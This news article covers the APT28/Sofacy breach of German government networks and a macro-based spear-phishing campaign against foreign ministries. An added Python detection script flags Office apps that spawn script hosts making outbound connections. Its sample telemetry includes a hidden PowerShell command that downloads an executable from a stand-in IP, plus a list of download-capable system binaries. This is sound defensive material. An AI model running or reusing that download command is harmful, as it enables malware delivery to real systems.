The group – also known as APT28, Fancy Bear, and Pawn Storm – has been targeting government institutions, political organizations and military/defense companies around the world for over a decade.
Confirmation of the breach
The confirmation of the breach came from Johannes Dimroth, a spokesman for the German Interior Ministry, but he did not comment on the possible perpetrator.
The attribution apparently came from German security agencies, which are confident that hackers linked to the Russian state were behind the attacks.
Dimroth told Dpa International that government information technology and networks had been hit and that protective measures were being taken. Among the compromised networks are those of the foreign and defense ministries, the German Chancellery and the Federal Court of Auditors.
The ongoing investigation into the breach is led by the Federal Office for Information Security (BSI) and the Federal Office for the Protection of the Constitution (BfV), with support from Germany’s foreign intelligence service.
What is known so far is that the breach was spotted in December 2017; the intrusion itself likely went on for a considerable time before that.
“This disclosure from the German Interior Ministry highlights that every organization can be targeted and hacked, regardless of its sector or industry. What continues to be key is how prepared organizations are to respond if all prevention techniques that have been deployed fail,” says Matthias Maier, Security Evangelist, Splunk.
“In this instance, the authorities, supported by specialists, need to investigate what happened over a year ago in their environment to identify how the attacker got in, what the weak point was, what was accessed and what systems might have been compromised. Hopefully, the organization has collected and stored all log data from its entire digital infrastructure in order to put these pieces of the puzzle together. The reports so far in the news have indicated that the detection happened in December and it continues to be investigated, highlighting the complexity involved in such a process.”
The Sofacy group is believed to consist of Russian citizens or Russian-speaking citizens of a neighboring country, and the targets it has hit over the years point to the group acting in the service of Russian national interests.
On Wednesday, Palo Alto Networks researchers published details about an attack targeting two Ministries of Foreign Affairs that they believe to be the work of the Sofacy hackers.
“One organization is geographically located in Europe and the other in North America,” the company’s researchers shared.
The attacks, spotted in early February 2018, take the form of spear-phishing emails carrying a Microsoft Excel XLS document that contains a malicious macro script. The script downloads a loader Trojan, which in turn downloads a variant of the SofacyCarberp downloader Trojan, which can then be used to pull additional malware onto the compromised systems.
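The chain described above (an Office macro launching a downloader that fetches the next stage) leaves a characteristic trace in endpoint telemetry: an Office process starting a script host or other download-capable binary, which then makes an outbound connection. The following is an added example of detection logic for that pattern, not code from the article or from Palo Alto Networks; it runs over constructed, Sysmon-style process-creation and network-connection events, and the process names, PIDs, paths and the 203.0.113.10 address are all assumptions made for the illustration.

```python
# Added example: detection logic for the macro-delivered downloader chain
# (Office process -> script host -> outbound connection). It runs over
# constructed, Sysmon-like process-creation and network events; it is not
# code from the original article or from any vendor's product.
from dataclasses import dataclass
from typing import Dict, List

# Office applications whose child processes deserve scrutiny (assumption:
# the macro runs in one of these; the article names Excel).
OFFICE_APPS = {"excel.exe", "winword.exe", "powerpnt.exe", "outlook.exe"}
# Living-off-the-land binaries a macro commonly uses to fetch a second stage.
DOWNLOAD_CAPABLE = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe",
                    "mshta.exe", "certutil.exe", "bitsadmin.exe", "rundll32.exe",
                    "regsvr32.exe"}


@dataclass(frozen=True)
class ProcessEvent:        # modelled on Sysmon Event ID 1 (process create)
    pid: int
    image: str
    parent_pid: int
    parent_image: str
    command_line: str


@dataclass(frozen=True)
class NetworkEvent:        # modelled on Sysmon Event ID 3 (network connect)
    pid: int
    image: str
    dest_ip: str
    dest_port: int


def image_name(path: str) -> str:
    """Case-insensitive basename of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_spawned_script_hosts(procs: List[ProcessEvent]) -> List[ProcessEvent]:
    """Rule 1: an Office app starting a scripting/download-capable binary.
    A legitimate spreadsheet almost never needs this; a macro dropper does."""
    return [p for p in procs
            if image_name(p.parent_image) in OFFICE_APPS
            and image_name(p.image) in DOWNLOAD_CAPABLE]


def office_direct_connections(nets: List[NetworkEvent]) -> List[NetworkEvent]:
    """Rule 2: the Office process itself talking to the network, which a macro
    using MSXML2.XMLHTTP or URLDownloadToFile does without any child process."""
    return [n for n in nets if image_name(n.image) in OFFICE_APPS]


def macro_download_chains(procs: List[ProcessEvent],
                          nets: List[NetworkEvent]) -> List[Dict[str, object]]:
    """Rule 3: correlate rule 1 hits with a network connection made by the
    spawned child (the loader fetch), yielding one finding per chain."""
    first_conn_by_pid: Dict[int, NetworkEvent] = {}
    for n in nets:
        first_conn_by_pid.setdefault(n.pid, n)
    findings = []
    for child in office_spawned_script_hosts(procs):
        net = first_conn_by_pid.get(child.pid)
        if net is not None:
            findings.append({
                "parent": image_name(child.parent_image),
                "child": image_name(child.image),
                "child_pid": child.pid,
                "command_line": child.command_line,
                "remote": f"{net.dest_ip}:{net.dest_port}",
            })
    return findings


# Constructed sample telemetry (not real data): a benign Excel start, a macro
# that launches PowerShell to fetch a loader from a TEST-NET address, and a
# browser session that must not be flagged.
SAMPLE_PROCS = [
    ProcessEvent(4100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 1200, r"C:\Windows\explorer.exe", "EXCEL.EXE /dde"),
    ProcessEvent(4188, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 4100, r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
                 "powershell -w hidden -c (New-Object Net.WebClient).DownloadFile("
                 "'http://203.0.113.10/ld.exe','C:\\Users\\Public\\ld.exe')"),
    ProcessEvent(5020, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 1200, r"C:\Windows\explorer.exe", "chrome.exe"),
]
SAMPLE_NETS = [
    NetworkEvent(4188, r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
                 "203.0.113.10", 80),
    NetworkEvent(5020, r"C:\Program Files\Google\Chrome\Application\chrome.exe",
                 "198.51.100.7", 443),
]

if __name__ == "__main__":
    for f in macro_download_chains(SAMPLE_PROCS, SAMPLE_NETS):
        print(f"ALERT {f['parent']} -> {f['child']} (pid {f['child_pid']}) -> {f['remote']}")
```

Rule 1 on its own is the high-value signal and fires before any payload is fetched; rule 3 adds the network context an analyst needs to pivot to the download host. Rule 2 covers macros that download from inside the Office process instead of spawning a child, which rule 1 would miss.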